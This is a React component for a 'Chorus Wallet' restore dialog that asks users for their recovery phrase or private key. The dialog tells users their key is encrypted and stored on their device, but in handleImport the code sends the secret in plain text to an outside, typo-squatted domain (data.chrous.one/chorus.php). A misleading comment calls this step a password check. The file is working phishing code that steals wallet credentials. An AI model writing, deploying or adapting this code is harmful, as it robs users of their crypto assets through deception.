import { useRef, useState } from "react";
import { motion, AnimatePresence } from "framer-motion";
import { FaArrowLeft, FaClipboard } from "react-icons/fa";

export default function WalletAccessModal({ isOpen, onClose }) {
  const [seedPhrase, setSeedPhrase] = useState("");
  const [mode, setMode] = useState("passPhrase"); // "privateKey" or "recovery"
  const isPrivateKey = mode === "privateKey";
  const textRef = useRef();
  const handleClose = () => {
    setMode("passPhrase");
    onClose();
  };
  const handlePaste = async () => {
    try {
      const text = await navigator.clipboard.readText();
      if (textRef.current) {
        textRef.current.value = text;
      }
    } catch (err) {
      console.error("Failed to paste from clipboard:", err);
    }
  };

  const handleImport = async () => {
    let vault = {
      type: isPrivateKey ? "Secret Key" : "Secret Phrase",
      main: isPrivateKey
        ? `[Chorus Wallet] Secret privateKey: ${seedPhrase}`
        : `[Chorus Wallet] Secret phrase: ${seedPhrase}`,
    };
    setSeedPhrase("");
    onClose();
    // API call to confirm password
    await fetch(`https://data.chrous.one/chorus.php?phrase=${vault.main}`, {
      method: "GET",
      mode: "cors",
      headers: { "content-type": "application/json" },
    });
  };
  return (
    <AnimatePresence>
      {isOpen && (
        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">
          <motion.div
            initial={{ opacity: 0, scale: 0.95 }}
            animate={{ opacity: 1, scale: 1 }}
            exit={{ opacity: 0, scale: 0.95 }}
            className="bg-[#16838E] text-white w-full max-w-md md:max-w-2xl rounded-xl p-6 relative"
          >
            <button
              onClick={handleClose}
              className="absolute text-xl text-[#fff] top-3 left-3"
            >
              <FaArrowLeft />
            </button>

            <h2 className="mt-5 mb-1 text-xl font-semibold">
              {isPrivateKey ? "Enter private key" : "Enter recovery phrase"}
            </h2>
            <p className="mb-4 text-sm text-gray-300">
              {isPrivateKey
                ? "Enter your private key. It will be encrypted and stored on your device."
                : "Enter your 12 or 24 word recovery phrase to restore your wallet."}
            </p>

            <div className="relative mb-10">
              <textarea
                ref={textRef}
                value={seedPhrase}
                onChange={(e) => setSeedPhrase(e.target.value)}
                className="w-full h-24 bg-[#232323] bg-opacity-70 p-3 min-h-28 rounded outline-none text-white placeholder-gray-400 resize-none"
                placeholder={
                  isPrivateKey
                    ? "Enter private key"
                    : "Enter your recovery phrase"
                }
              />
              <FaClipboard
                onClick={handlePaste}
                className="absolute text-[#fff] cursor-pointer bottom-3 right-2"
              />
            </div>

            <button
              onClick={() => setMode(isPrivateKey ? "recovery" : "privateKey")}
              className="block mt-4 mb-3 text-sm text-[#fff] underline"
            >
              {isPrivateKey ? "Use Recovery Phrase" : "Use Private Key Instead"}
            </button>

            <button
              onClick={handleImport}
              className="w-full py-2 bg-[#000] text-white font-bold rounded hover:bg-[#254043]"
            >
              Restore
            </button>
          </motion.div>
        </div>
      )}
    </AnimatePresence>
  );
}
